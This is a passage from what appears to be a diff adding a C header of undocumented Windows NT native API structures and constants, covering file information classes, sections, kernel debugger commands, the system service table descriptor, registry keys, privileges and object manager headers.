FileFsAttributeInformation, + FileFsControlInformation, + FileFsFullSizeInformation, + FileFsObjectIdInformation, + FileFsDriverPathInformation, + FileFsVolumeFlagsInformation, + FileFsMaximumInformation +} FS_INFORMATION_CLASS, *PFS_INFORMATION_CLASS; +#endif + +typedef struct _FILE_BASIC_INFORMATION { + LARGE_INTEGER CreationTime; + LARGE_INTEGER LastAccessTime; + LARGE_INTEGER LastWriteTime; + LARGE_INTEGER ChangeTime; + ULONG FileAttributes; +} FILE_BASIC_INFORMATION, *PFILE_BASIC_INFORMATION; + +typedef struct _FILE_STANDARD_INFORMATION +{ + LARGE_INTEGER AllocationSize; + LARGE_INTEGER EndOfFile; + ULONG NumberOfLinks; + UCHAR DeletePending; + UCHAR Directory; +} FILE_STANDARD_INFORMATION; + +typedef struct _FILE_INTERNAL_INFORMATION { + LARGE_INTEGER IndexNumber; +} FILE_INTERNAL_INFORMATION, *PFILE_INTERNAL_INFORMATION; + +typedef struct _FILE_EA_INFORMATION { + ULONG EaSize; +} FILE_EA_INFORMATION, *PFILE_EA_INFORMATION; + +typedef struct _FILE_ACCESS_INFORMATION { + ACCESS_MASK AccessFlags; +} FILE_ACCESS_INFORMATION, *PFILE_ACCESS_INFORMATION; + +typedef struct _FILE_POSITION_INFORMATION { + LARGE_INTEGER CurrentByteOffset; +} FILE_POSITION_INFORMATION, *PFILE_POSITION_INFORMATION; + +typedef struct _FILE_MODE_INFORMATION { + ULONG Mode; +} FILE_MODE_INFORMATION, *PFILE_MODE_INFORMATION; + +typedef struct _FILE_ALIGNMENT_INFORMATION { + ULONG AlignmentRequirement; +} FILE_ALIGNMENT_INFORMATION, *PFILE_ALIGNMENT_INFORMATION; + +typedef struct _FILE_NAME_INFORMATION { + ULONG FileNameLength; + WCHAR FileName[1]; +} FILE_NAME_INFORMATION, *PFILE_NAME_INFORMATION; + +typedef struct _FILE_ALL_INFORMATION { + FILE_BASIC_INFORMATION BasicInformation; + FILE_STANDARD_INFORMATION StandardInformation; + FILE_INTERNAL_INFORMATION InternalInformation; + FILE_EA_INFORMATION EaInformation; + FILE_ACCESS_INFORMATION AccessInformation; + FILE_POSITION_INFORMATION PositionInformation; + FILE_MODE_INFORMATION ModeInformation; + FILE_ALIGNMENT_INFORMATION AlignmentInformation; + FILE_NAME_INFORMATION NameInformation; +} FILE_ALL_INFORMATION, *PFILE_ALL_INFORMATION; + +typedef struct _FILE_NETWORK_OPEN_INFORMATION { + LARGE_INTEGER CreationTime; + LARGE_INTEGER LastAccessTime; + LARGE_INTEGER LastWriteTime; + LARGE_INTEGER ChangeTime; + LARGE_INTEGER AllocationSize; + LARGE_INTEGER EndOfFile; + ULONG FileAttributes; +} FILE_NETWORK_OPEN_INFORMATION, *PFILE_NETWORK_OPEN_INFORMATION; + +typedef struct _FILE_ATTRIBUTE_TAG_INFORMATION { + ULONG FileAttributes; + ULONG ReparseTag; +} FILE_ATTRIBUTE_TAG_INFORMATION, *PFILE_ATTRIBUTE_TAG_INFORMATION; + +typedef struct _FILE_ALLOCATION_INFORMATION { + LARGE_INTEGER AllocationSize; +} FILE_ALLOCATION_INFORMATION, *PFILE_ALLOCATION_INFORMATION; + +typedef struct _FILE_COMPRESSION_INFORMATION { + LARGE_INTEGER CompressedFileSize; + USHORT CompressionFormat; + UCHAR CompressionUnitShift; + UCHAR ChunkShift; + UCHAR ClusterShift; + UCHAR Reserved[3]; +} FILE_COMPRESSION_INFORMATION, *PFILE_COMPRESSION_INFORMATION; + +typedef struct _FILE_DISPOSITION_INFORMATION { + BOOLEAN DeleteFile; +} FILE_DISPOSITION_INFORMATION, *PFILE_DISPOSITION_INFORMATION; + +typedef struct _FILE_END_OF_FILE_INFORMATION { + LARGE_INTEGER EndOfFile; +} FILE_END_OF_FILE_INFORMATION, *PFILE_END_OF_FILE_INFORMATION; + +typedef struct _FILE_VALID_DATA_LENGTH_INFORMATION { + LARGE_INTEGER ValidDataLength; +} FILE_VALID_DATA_LENGTH_INFORMATION, *PFILE_VALID_DATA_LENGTH_INFORMATION; + +typedef struct _FILE_LINK_INFORMATION { + BOOLEAN ReplaceIfExists; + HANDLE RootDirectory; + ULONG FileNameLength; + WCHAR FileName[1]; +} FILE_LINK_INFORMATION, *PFILE_LINK_INFORMATION; + +typedef struct _FILE_MOVE_CLUSTER_INFORMATION { + ULONG ClusterCount; + HANDLE RootDirectory; + ULONG FileNameLength; + WCHAR FileName[1]; +} FILE_MOVE_CLUSTER_INFORMATION, *PFILE_MOVE_CLUSTER_INFORMATION; + +typedef struct _FILE_RENAME_INFORMATION { + BOOLEAN ReplaceIfExists; + HANDLE RootDirectory; + ULONG FileNameLength; + WCHAR FileName[1]; +} FILE_RENAME_INFORMATION, *PFILE_RENAME_INFORMATION; + +typedef struct _FILE_STREAM_INFORMATION { + ULONG NextEntryOffset; + ULONG StreamNameLength; + LARGE_INTEGER StreamSize; + LARGE_INTEGER StreamAllocationSize; + WCHAR StreamName[1]; +} FILE_STREAM_INFORMATION, *PFILE_STREAM_INFORMATION; + +typedef struct _FILE_TRACKING_INFORMATION { + HANDLE DestinationFile; + ULONG ObjectInformationLength; + CHAR ObjectInformation[1]; +} FILE_TRACKING_INFORMATION, *PFILE_TRACKING_INFORMATION; + +typedef struct _FILE_COMPLETION_INFORMATION { + HANDLE Port; + PVOID Key; +} FILE_COMPLETION_INFORMATION, *PFILE_COMPLETION_INFORMATION; + +// +// Define the NamedPipeType flags for NtCreateNamedPipeFile +// + +#define FILE_PIPE_BYTE_STREAM_TYPE 0x00000000 +#define FILE_PIPE_MESSAGE_TYPE 0x00000001 + +// +// Define the CompletionMode flags for NtCreateNamedPipeFile +// + +#define FILE_PIPE_QUEUE_OPERATION 0x00000000 +#define FILE_PIPE_COMPLETE_OPERATION 0x00000001 + +// +// Define the ReadMode flags for NtCreateNamedPipeFile +// + +#define FILE_PIPE_BYTE_STREAM_MODE 0x00000000 +#define FILE_PIPE_MESSAGE_MODE 0x00000001 + +// +// Define the NamedPipeConfiguration flags for NtQueryInformation +// + +#define FILE_PIPE_INBOUND 0x00000000 +#define FILE_PIPE_OUTBOUND 0x00000001 +#define FILE_PIPE_FULL_DUPLEX 0x00000002 + +// +// Define the NamedPipeState flags for NtQueryInformation +// + +#define FILE_PIPE_DISCONNECTED_STATE 0x00000001 +#define FILE_PIPE_LISTENING_STATE 0x00000002 +#define FILE_PIPE_CONNECTED_STATE 0x00000003 +#define FILE_PIPE_CLOSING_STATE 0x00000004 + +// +// Define the NamedPipeEnd flags for NtQueryInformation +// + +#define FILE_PIPE_CLIENT_END 0x00000000 +#define FILE_PIPE_SERVER_END 0x00000001 + + +typedef struct _FILE_PIPE_INFORMATION { + ULONG ReadMode; + ULONG CompletionMode; +} FILE_PIPE_INFORMATION, *PFILE_PIPE_INFORMATION; + +typedef struct _FILE_PIPE_LOCAL_INFORMATION { + ULONG NamedPipeType; + ULONG NamedPipeConfiguration; + ULONG MaximumInstances; + ULONG CurrentInstances; + ULONG InboundQuota; + ULONG ReadDataAvailable; + ULONG OutboundQuota; + ULONG WriteQuotaAvailable; + ULONG NamedPipeState; + ULONG NamedPipeEnd; +} FILE_PIPE_LOCAL_INFORMATION, *PFILE_PIPE_LOCAL_INFORMATION; + +typedef struct _FILE_PIPE_REMOTE_INFORMATION { + LARGE_INTEGER CollectDataTime; + ULONG MaximumCollectionCount; +} FILE_PIPE_REMOTE_INFORMATION, *PFILE_PIPE_REMOTE_INFORMATION; + +typedef struct _FILE_MAILSLOT_QUERY_INFORMATION { + ULONG MaximumMessageSize; + ULONG MailslotQuota; + ULONG NextMessageSize; + ULONG MessagesAvailable; + LARGE_INTEGER ReadTimeout; +} FILE_MAILSLOT_QUERY_INFORMATION, *PFILE_MAILSLOT_QUERY_INFORMATION; + +typedef struct _FILE_MAILSLOT_SET_INFORMATION { + PLARGE_INTEGER ReadTimeout; +} FILE_MAILSLOT_SET_INFORMATION, *PFILE_MAILSLOT_SET_INFORMATION; + +typedef struct _FILE_REPARSE_POINT_INFORMATION { + LONGLONG FileReference; + ULONG Tag; +} FILE_REPARSE_POINT_INFORMATION, *PFILE_REPARSE_POINT_INFORMATION; + +// +// Define the flags for NtSet(Query)EaFile service structure entries +// + +#define FILE_NEED_EA 0x00000080 + +// +// Define EA type values +// + +#define FILE_EA_TYPE_BINARY 0xfffe +#define FILE_EA_TYPE_ASCII 0xfffd +#define FILE_EA_TYPE_BITMAP 0xfffb +#define FILE_EA_TYPE_METAFILE 0xfffa +#define FILE_EA_TYPE_ICON 0xfff9 +#define FILE_EA_TYPE_EA 0xffee +#define FILE_EA_TYPE_MVMT 0xffdf +#define FILE_EA_TYPE_MVST 0xffde +#define FILE_EA_TYPE_ASN1 0xffdd +#define FILE_EA_TYPE_FAMILY_IDS 0xff01 + +typedef struct _FILE_FULL_EA_INFORMATION { + ULONG NextEntryOffset; + UCHAR Flags; + UCHAR EaNameLength; + USHORT EaValueLength; + CHAR EaName[1]; +} FILE_FULL_EA_INFORMATION, *PFILE_FULL_EA_INFORMATION; + +typedef struct _FILE_GET_EA_INFORMATION { + ULONG NextEntryOffset; + UCHAR EaNameLength; + CHAR EaName[1]; +} FILE_GET_EA_INFORMATION, *PFILE_GET_EA_INFORMATION; + +typedef struct _FILE_GET_QUOTA_INFORMATION { + ULONG NextEntryOffset; + ULONG SidLength; + SID Sid; +} FILE_GET_QUOTA_INFORMATION, *PFILE_GET_QUOTA_INFORMATION; + +typedef struct _FILE_QUOTA_INFORMATION { + ULONG NextEntryOffset; + ULONG SidLength; + LARGE_INTEGER ChangeTime; + LARGE_INTEGER QuotaUsed; + LARGE_INTEGER QuotaThreshold; + LARGE_INTEGER QuotaLimit; + SID Sid; +} FILE_QUOTA_INFORMATION, *PFILE_QUOTA_INFORMATION; + +typedef struct _FILE_DIRECTORY_INFORMATION { + ULONG NextEntryOffset; + ULONG FileIndex; + LARGE_INTEGER CreationTime; + LARGE_INTEGER LastAccessTime; + LARGE_INTEGER LastWriteTime; + LARGE_INTEGER ChangeTime; + LARGE_INTEGER EndOfFile; + LARGE_INTEGER AllocationSize; + ULONG FileAttributes; + ULONG FileNameLength; + WCHAR FileName[1]; +} FILE_DIRECTORY_INFORMATION, *PFILE_DIRECTORY_INFORMATION; + +typedef struct _FILE_FULL_DIR_INFORMATION { + ULONG NextEntryOffset; + ULONG FileIndex; + LARGE_INTEGER CreationTime; + LARGE_INTEGER LastAccessTime; + LARGE_INTEGER LastWriteTime; + LARGE_INTEGER ChangeTime; + LARGE_INTEGER EndOfFile; + LARGE_INTEGER AllocationSize; + ULONG FileAttributes; + ULONG FileNameLength; + ULONG EaSize; + WCHAR FileName[1]; +} FILE_FULL_DIR_INFORMATION, *PFILE_FULL_DIR_INFORMATION; + +typedef struct _FILE_ID_FULL_DIR_INFORMATION { + ULONG NextEntryOffset; + ULONG FileIndex; + LARGE_INTEGER CreationTime; + LARGE_INTEGER LastAccessTime; + LARGE_INTEGER LastWriteTime; + LARGE_INTEGER ChangeTime; + LARGE_INTEGER EndOfFile; + LARGE_INTEGER AllocationSize; + ULONG FileAttributes; + ULONG FileNameLength; + ULONG EaSize; + LARGE_INTEGER FileId; + WCHAR FileName[1]; +} FILE_ID_FULL_DIR_INFORMATION, *PFILE_ID_FULL_DIR_INFORMATION; + +typedef struct _FILE_BOTH_DIR_INFORMATION { + ULONG NextEntryOffset; + ULONG FileIndex; + LARGE_INTEGER CreationTime; + LARGE_INTEGER LastAccessTime; + LARGE_INTEGER LastWriteTime; + LARGE_INTEGER ChangeTime; + LARGE_INTEGER EndOfFile; + LARGE_INTEGER AllocationSize; + ULONG FileAttributes; + ULONG FileNameLength; + ULONG EaSize; + CCHAR ShortNameLength; + WCHAR ShortName[12]; + WCHAR FileName[1]; +} FILE_BOTH_DIR_INFORMATION, *PFILE_BOTH_DIR_INFORMATION; + +typedef struct _FILE_ID_BOTH_DIR_INFORMATION { + ULONG NextEntryOffset; + ULONG FileIndex; + LARGE_INTEGER CreationTime; + LARGE_INTEGER LastAccessTime; + LARGE_INTEGER LastWriteTime; + LARGE_INTEGER ChangeTime; + LARGE_INTEGER EndOfFile; + LARGE_INTEGER AllocationSize; + ULONG FileAttributes; + ULONG FileNameLength; + ULONG EaSize; + CCHAR ShortNameLength; + WCHAR ShortName[12]; + LARGE_INTEGER FileId; + WCHAR FileName[1]; +} FILE_ID_BOTH_DIR_INFORMATION, *PFILE_ID_BOTH_DIR_INFORMATION; + +typedef struct _FILE_NAMES_INFORMATION { + ULONG NextEntryOffset; + ULONG FileIndex; + ULONG FileNameLength; + WCHAR FileName[1]; +} FILE_NAMES_INFORMATION, *PFILE_NAMES_INFORMATION; + +typedef struct _FILE_OBJECTID_INFORMATION { + LONGLONG FileReference; + UCHAR ObjectId[16]; + union { + struct { + UCHAR BirthVolumeId[16]; + UCHAR BirthObjectId[16]; + UCHAR DomainId[16]; + }; + UCHAR ExtendedInfo[48]; + }; +} FILE_OBJECTID_INFORMATION, *PFILE_OBJECTID_INFORMATION; + +typedef struct _FILE_FS_VOLUME_INFORMATION { + LARGE_INTEGER VolumeCreationTime; + ULONG VolumeSerialNumber; + ULONG VolumeLabelLength; + BOOLEAN SupportsObjects; + WCHAR VolumeLabel[1]; +} FILE_FS_VOLUME_INFORMATION, *PFILE_FS_VOLUME_INFORMATION; + +/* +** File END +*/ + +/* +** Section START +*/ + +#ifndef _SECTION_INFORMATION_CLASS +typedef enum _SECTION_INFORMATION_CLASS { + SectionBasicInformation, + SectionImageInformation, + SectionRelocationInformation, + MaxSectionInfoClass +} SECTION_INFORMATION_CLASS; +#endif + +typedef struct _SECTIONBASICINFO { + PVOID BaseAddress; + ULONG AllocationAttributes; + LARGE_INTEGER MaximumSize; +} SECTION_BASIC_INFORMATION, *PSECTION_BASIC_INFORMATION; + +typedef struct _SECTION_IMAGE_INFORMATION { + PVOID TransferAddress; + ULONG ZeroBits; + SIZE_T MaximumStackSize; + SIZE_T CommittedStackSize; + ULONG SubSystemType; + union { + struct { + USHORT SubSystemMinorVersion; + USHORT SubSystemMajorVersion; + }; + ULONG SubSystemVersion; + }; + ULONG GpValue; + USHORT ImageCharacteristics; + USHORT DllCharacteristics; + USHORT Machine; + BOOLEAN ImageContainsCode; + BOOLEAN Spare1; + ULONG LoaderFlags; + ULONG ImageFileSize; + ULONG Reserved[1]; +} SECTION_IMAGE_INFORMATION, *PSECTION_IMAGE_INFORMATION; + +typedef struct _SECTION_IMAGE_INFORMATION64 { + ULONGLONG TransferAddress; + ULONG ZeroBits; + ULONGLONG MaximumStackSize; + ULONGLONG CommittedStackSize; + ULONG SubSystemType; + union { + struct { + USHORT SubSystemMinorVersion; + USHORT SubSystemMajorVersion; + }; + ULONG SubSystemVersion; + }; + ULONG GpValue; + USHORT ImageCharacteristics; + USHORT DllCharacteristics; + USHORT Machine; + BOOLEAN ImageContainsCode; + BOOLEAN Spare1; + ULONG LoaderFlags; + ULONG ImageFileSize; + ULONG Reserved[1]; +} SECTION_IMAGE_INFORMATION64, *PSECTION_IMAGE_INFORMATION64; + +typedef enum _SECTION_INHERIT { + ViewShare = 1, + ViewUnmap = 2 +} SECTION_INHERIT; + +#define SEC_BASED 0x200000 +#define SEC_NO_CHANGE 0x400000 +#define SEC_FILE 0x800000 +#define SEC_IMAGE 0x1000000 +#define SEC_RESERVE 0x4000000 +#define SEC_COMMIT 0x8000000 +#define SEC_NOCACHE 0x10000000 +#define SEC_GLOBAL 0x20000000 +#define SEC_LARGE_PAGES 0x80000000 + +/* +** Section END +*/ + +/* +** Kernel Debugger START +*/ + +#ifndef _SYSDBG_COMMAND +typedef enum _SYSDBG_COMMAND { + SysDbgQueryModuleInformation, + SysDbgQueryTraceInformation, + SysDbgSetTracepoint, + SysDbgSetSpecialCall, + SysDbgClearSpecialCalls, + SysDbgQuerySpecialCalls, + SysDbgBreakPoint, + SysDbgQueryVersion, + SysDbgReadVirtual, + SysDbgWriteVirtual, + SysDbgReadPhysical, + SysDbgWritePhysical, + SysDbgReadControlSpace, + SysDbgWriteControlSpace, + SysDbgReadIoSpace, + SysDbgWriteIoSpace, + SysDbgReadMsr, + SysDbgWriteMsr, + SysDbgReadBusData, + SysDbgWriteBusData, + SysDbgCheckLowMemory, + SysDbgEnableKernelDebugger, + SysDbgDisableKernelDebugger, + SysDbgGetAutoKdEnable, + SysDbgSetAutoKdEnable, + SysDbgGetPrintBufferSize, + SysDbgSetPrintBufferSize, + SysDbgGetKdUmExceptionEnable, + SysDbgSetKdUmExceptionEnable, + SysDbgGetTriageDump, + SysDbgGetKdBlockEnable, + SysDbgSetKdBlockEnable, + SysDbgRegisterForUmBreakInfo, + SysDbgGetUmBreakPid, + SysDbgClearUmBreakPid, + SysDbgGetUmAttachPid, + SysDbgClearUmAttachPid +} SYSDBG_COMMAND, *PSYSDBG_COMMAND; +#endif + +#ifndef _SYSDBG_VIRTUAL +typedef struct _SYSDBG_VIRTUAL +{ + PVOID Address; + PVOID Buffer; + ULONG Request; +} SYSDBG_VIRTUAL, *PSYSDBG_VIRTUAL; +#endif + +/* +** Kernel Debugger END +*/ + +/* +** System Table START +*/ +#define NUMBER_SERVICE_TABLES 2 +#define SERVICE_NUMBER_MASK ((1 << 12) - 1) + +#if defined(_WIN64) + +#if defined(_AMD64_) + +#define SERVICE_TABLE_SHIFT (12 - 4) +#define SERVICE_TABLE_MASK (((1 << 1) - 1) << 4) +#define SERVICE_TABLE_TEST (WIN32K_SERVICE_INDEX << 4) + +#else + +#define SERVICE_TABLE_SHIFT (12 - 5) +#define SERVICE_TABLE_MASK (((1 << 1) - 1) << 5) +#define SERVICE_TABLE_TEST (WIN32K_SERVICE_INDEX << 5) + +#endif + +#else + +#define SERVICE_TABLE_SHIFT (12 - 4) +#define SERVICE_TABLE_MASK (((1 << 1) - 1) << 4) +#define SERVICE_TABLE_TEST (WIN32K_SERVICE_INDEX << 4) + +#endif + +typedef struct _KSERVICE_TABLE_DESCRIPTOR { + ULONG_PTR Base; //e.g. KiServiceTable + PULONG Count; + ULONG Limit;//e.g. KiServiceLimit + PUCHAR Number; //e.g. KiArgumentTable +} KSERVICE_TABLE_DESCRIPTOR, *PKSERVICE_TABLE_DESCRIPTOR; +/* +** System Table END +*/ + + +/* +** System Boot Environment START +*/ + +typedef struct _SYSTEM_BOOT_ENVIRONMENT_INFORMATION_V1 // Size=20 +{ + struct _GUID BootIdentifier; + enum _FIRMWARE_TYPE FirmwareType; +} SYSTEM_BOOT_ENVIRONMENT_INFORMATION_V1, *PSYSTEM_BOOT_ENVIRONMENT_INFORMATION_V1; + +typedef struct _SYSTEM_BOOT_ENVIRONMENT_INFORMATION // Size=32 +{ + struct _GUID BootIdentifier; + enum _FIRMWARE_TYPE FirmwareType; + unsigned __int64 BootFlags; +} SYSTEM_BOOT_ENVIRONMENT_INFORMATION, *PSYSTEM_BOOT_ENVIRONMENT_INFORMATION; + +/* +** System Boot Environment END +*/ + +/* +** Mutant START +*/ + +#ifndef _MUTANT_INFORMATION_CLASS +typedef enum _MUTANT_INFORMATION_CLASS { + MutantBasicInformation +} MUTANT_INFORMATION_CLASS; +#endif + +#ifndef _MUTANT_BASIC_INFORMATION +typedef struct _MUTANT_BASIC_INFORMATION { + LONG CurrentCount; + BOOLEAN OwnedByCaller; + BOOLEAN AbandonedState; +} MUTANT_BASIC_INFORMATION, *PMUTANT_BASIC_INFORMATION; +#endif + +/* +** Mutant END +*/ + +/* +** Key START +*/ + +#ifndef _KEY_INFORMATION_CLASS +typedef enum _KEY_INFORMATION_CLASS { + KeyBasicInformation, + KeyNodeInformation, + KeyFullInformation, + KeyNameInformation, + KeyCachedInformation, + KeyFlagsInformation, + MaxKeyInfoClass +} KEY_INFORMATION_CLASS; +#endif + +#ifndef _KEY_FULL_INFORMATION +typedef struct _KEY_FULL_INFORMATION { + LARGE_INTEGER LastWriteTime; + ULONG TitleIndex; + ULONG ClassOffset; + ULONG ClassLength; + ULONG SubKeys; + ULONG MaxNameLen; + ULONG MaxClassLen; + ULONG Values; + ULONG MaxValueNameLen; + ULONG MaxValueDataLen; + WCHAR Class[1]; +} KEY_FULL_INFORMATION, *PKEY_FULL_INFORMATION; +#endif + +#ifndef _KEY_BASIC_INFORMATION +typedef struct _KEY_BASIC_INFORMATION { + LARGE_INTEGER LastWriteTime; + ULONG TitleIndex; + ULONG NameLength; + WCHAR Name[1]; +} KEY_BASIC_INFORMATION, *PKEY_BASIC_INFORMATION; +#endif + +#ifndef _KEY_VALUE_INFORMATION_CLASS +typedef enum _KEY_VALUE_INFORMATION_CLASS { + KeyValueBasicInformation, + KeyValueFullInformation, + KeyValuePartialInformation, + KeyValueFullInformationAlign64, + KeyValuePartialInformationAlign64, + MaxKeyValueInfoClass +} KEY_VALUE_INFORMATION_CLASS; +#endif + +#ifndef _KEY_VALUE_BASIC_INFORMATION +typedef struct _KEY_VALUE_BASIC_INFORMATION { + ULONG TitleIndex; + ULONG Type; + ULONG NameLength; + WCHAR Name[1]; // Variable size +} KEY_VALUE_BASIC_INFORMATION, *PKEY_VALUE_BASIC_INFORMATION; +#endif + +#ifndef _KEY_VALUE_FULL_INFORMATION +typedef struct _KEY_VALUE_FULL_INFORMATION { + ULONG TitleIndex; + ULONG Type; + ULONG DataOffset; + ULONG DataLength; + ULONG NameLength; + WCHAR Name[1]; // Variable size + // Data[1]; // Variable size data not declared +} KEY_VALUE_FULL_INFORMATION, *PKEY_VALUE_FULL_INFORMATION; +#endif + +#ifndef _KEY_VALUE_PARTIAL_INFORMATION +typedef struct _KEY_VALUE_PARTIAL_INFORMATION { + ULONG TitleIndex; + ULONG Type; + ULONG DataLength; + UCHAR Data[1]; // Variable size +} KEY_VALUE_PARTIAL_INFORMATION, *PKEY_VALUE_PARTIAL_INFORMATION; +#endif + +#ifndef _KEY_VALUE_PARTIAL_INFORMATION_ALIGN64 +typedef struct _KEY_VALUE_PARTIAL_INFORMATION_ALIGN64 { + ULONG Type; + ULONG DataLength; + UCHAR Data[1]; // Variable size +} KEY_VALUE_PARTIAL_INFORMATION_ALIGN64, *PKEY_VALUE_PARTIAL_INFORMATION_ALIGN64; +#endif + +#ifndef _KEY_VALUE_ENTRY +typedef struct _KEY_VALUE_ENTRY { + PUNICODE_STRING ValueName; + ULONG DataLength; + ULONG DataOffset; + ULONG Type; +} KEY_VALUE_ENTRY, *PKEY_VALUE_ENTRY; +#endif + +/* +** Key END +*/ + +/* +** IoCompletion START +*/ + +#ifndef _IO_COMPLETION_INFORMATION_CLASS +typedef enum _IO_COMPLETION_INFORMATION_CLASS { + IoCompletionBasicInformation +} IO_COMPLETION_INFORMATION_CLASS; +#endif + +#ifndef _IO_COMPLETION_BASIC_INFORMATION +typedef struct _IO_COMPLETION_BASIC_INFORMATION { + LONG Depth; +} IO_COMPLETION_BASIC_INFORMATION, *PIO_COMPLETION_BASIC_INFORMATION; +#endif + +/* +** IoCompletion END +*/ + +/* +** Event START +*/ + +// +// Event Specific Access Rights. +// + +typedef enum _EVENT_INFORMATION_CLASS { + EventBasicInformation +} EVENT_INFORMATION_CLASS; + +typedef enum _EVENT_TYPE { + NotificationEvent, + SynchronizationEvent +} EVENT_TYPE; + +typedef struct _EVENT_BASIC_INFORMATION { + EVENT_TYPE EventType; + LONG EventState; +} EVENT_BASIC_INFORMATION, *PEVENT_BASIC_INFORMATION; + +/* +** Event END +*/ + +/* +** TIME_FIELDS START +*/ + +#ifndef CSHORT +typedef short CSHORT; +#endif +typedef struct _TIME_FIELDS { + CSHORT Year; // range [1601...] + CSHORT Month; // range [1..12] + CSHORT Day; // range [1..31] + CSHORT Hour; // range [0..23] + CSHORT Minute; // range [0..59] + CSHORT Second; // range [0..59] + CSHORT Milliseconds;// range [0..999] + CSHORT Weekday; // range [0..6] == [Sunday..Saturday] +} TIME_FIELDS; +typedef TIME_FIELDS *PTIME_FIELDS; + +/* +** TIME_FIELDS END +*/ + +/* +** HANDLE START +*/ + +typedef struct _SYSTEM_HANDLE_TABLE_ENTRY_INFO { + USHORT UniqueProcessId; + USHORT CreatorBackTraceIndex; + UCHAR ObjectTypeIndex; + UCHAR HandleAttributes; + USHORT HandleValue; + PVOID Object; + ULONG GrantedAccess; +} SYSTEM_HANDLE_TABLE_ENTRY_INFO, *PSYSTEM_HANDLE_TABLE_ENTRY_INFO; + +typedef struct _SYSTEM_HANDLE_INFORMATION { + ULONG NumberOfHandles; + SYSTEM_HANDLE_TABLE_ENTRY_INFO Handles[1]; +} SYSTEM_HANDLE_INFORMATION, *PSYSTEM_HANDLE_INFORMATION; + +/* +** HANDLE END +*/ + +// Privileges + +#define SE_MIN_WELL_KNOWN_PRIVILEGE (2L) +#define SE_CREATE_TOKEN_PRIVILEGE (2L) +#define SE_ASSIGNPRIMARYTOKEN_PRIVILEGE (3L) +#define SE_LOCK_MEMORY_PRIVILEGE (4L) +#define SE_INCREASE_QUOTA_PRIVILEGE (5L) +#define SE_MACHINE_ACCOUNT_PRIVILEGE (6L) +#define SE_TCB_PRIVILEGE (7L) +#define SE_SECURITY_PRIVILEGE (8L) +#define SE_TAKE_OWNERSHIP_PRIVILEGE (9L) +#define SE_LOAD_DRIVER_PRIVILEGE (10L) +#define SE_SYSTEM_PROFILE_PRIVILEGE (11L) +#define SE_SYSTEMTIME_PRIVILEGE (12L) +#define SE_PROF_SINGLE_PROCESS_PRIVILEGE (13L) +#define SE_INC_BASE_PRIORITY_PRIVILEGE (14L) +#define SE_CREATE_PAGEFILE_PRIVILEGE (15L) +#define SE_CREATE_PERMANENT_PRIVILEGE (16L) +#define SE_BACKUP_PRIVILEGE (17L) +#define SE_RESTORE_PRIVILEGE (18L) +#define SE_SHUTDOWN_PRIVILEGE (19L) +#define SE_DEBUG_PRIVILEGE (20L) +#define SE_AUDIT_PRIVILEGE (21L) +#define SE_SYSTEM_ENVIRONMENT_PRIVILEGE (22L) +#define SE_CHANGE_NOTIFY_PRIVILEGE (23L) +#define SE_REMOTE_SHUTDOWN_PRIVILEGE (24L) +#define SE_UNDOCK_PRIVILEGE (25L) +#define SE_SYNC_AGENT_PRIVILEGE (26L) +#define SE_ENABLE_DELEGATION_PRIVILEGE (27L) +#define SE_MANAGE_VOLUME_PRIVILEGE (28L) +#define SE_IMPERSONATE_PRIVILEGE (29L) +#define SE_CREATE_GLOBAL_PRIVILEGE (30L) +#define SE_TRUSTED_CREDMAN_ACCESS_PRIVILEGE (31L) +#define SE_RELABEL_PRIVILEGE (32L) +#define SE_INC_WORKING_SET_PRIVILEGE (33L) +#define SE_TIME_ZONE_PRIVILEGE (34L) +#define SE_CREATE_SYMBOLIC_LINK_PRIVILEGE (35L) +#define SE_MAX_WELL_KNOWN_PRIVILEGE SE_CREATE_SYMBOLIC_LINK_PRIVILEGE + +#ifndef NT_SUCCESS +#define NT_SUCCESS(Status) (((NTSTATUS)(Status)) >= 0) +#endif + +/* +** OBJECT MANAGER START +*/ + +// +// Header flags +// + +#define OB_FLAG_NEW_OBJECT 0x01 +#define OB_FLAG_KERNEL_OBJECT 0x02 +#define OB_FLAG_CREATOR_INFO 0x04 +#define OB_FLAG_EXCLUSIVE_OBJECT 0x08 +#define OB_FLAG_PERMANENT_OBJECT 0x10 +#define OB_FLAG_DEFAULT_SECURITY_QUOTA 0x20 +#define OB_FLAG_SINGLE_HANDLE_ENTRY 0x40 +#define OB_FLAG_DELETED_INLINE 0x80 + +// +// InfoMask values +// + +#define OB_INFOMASK_PROCESS_INFO 0x10 +#define OB_INFOMASK_QUOTA 0x08 +#define OB_INFOMASK_HANDLE 0x04 +#define OB_INFOMASK_NAME 0x02 +#define OB_INFOMASK_CREATOR_INFO 0x01 + +typedef PVOID *PDEVICE_MAP; + +typedef struct _OBJECT_DIRECTORY_ENTRY { + PVOID ChainLink; + PVOID Object; + ULONG HashValue; +} OBJECT_DIRECTORY_ENTRY, *POBJECT_DIRECTORY_ENTRY; + +typedef struct _EX_PUSH_LOCK { + union + { + ULONG Locked : 1; + ULONG Waiting : 1; + ULONG Waking : 1; + ULONG MultipleShared : 1; + ULONG Shared : 28; + ULONG Value; + PVOID Ptr; + }; +} EX_PUSH_LOCK, *PEX_PUSH_LOCK; + +typedef struct _OBJECT_NAMESPACE_LOOKUPTABLE { + LIST_ENTRY HashBuckets[37]; + EX_PUSH_LOCK Lock; + ULONG NumberOfPrivateSpaces; +} OBJECT_NAMESPACE_LOOKUPTABLE, *POBJECT_NAMESPACE_LOOKUPTABLE; + +typedef struct _OBJECT_NAMESPACE_ENTRY { + LIST_ENTRY ListEntry; + PVOID NamespaceRootDirectory; + ULONG SizeOfBoundaryInformation; + ULONG Reserved; + UCHAR HashValue; + ULONG Alignment; +} OBJECT_NAMESPACE_ENTRY, *POBJECT_NAMESPACE_ENTRY; + +typedef struct _OBJECT_DIRECTORY { + POBJECT_DIRECTORY_ENTRY HashBuckets[37]; + EX_PUSH_LOCK Lock; + PDEVICE_MAP DeviceMap; + ULONG SessionId; + PVOID NamespaceEntry; + ULONG Flags; +} OBJECT_DIRECTORY, *POBJECT_DIRECTORY; + +typedef struct _OBJECT_HEADER_NAME_INFO { + POBJECT_DIRECTORY Directory; + UNICODE_STRING Name; + ULONG QueryReferences; +} OBJECT_HEADER_NAME_INFO, *POBJECT_HEADER_NAME_INFO; + +typedef struct _OBJECT_HEADER_CREATOR_INFO {// Size=32 + LIST_ENTRY TypeList; // Size=16 Offset=0 + PVOID CreatorUniqueProcess; // Size=8 Offset=16 + USHORT CreatorBackTraceIndex; // Size=2 Offset=24 + USHORT Reserved; // Size=2 Offset=26 +} OBJECT_HEADER_CREATOR_INFO, *POBJECT_HEADER_CREATOR_INFO; + +typedef struct 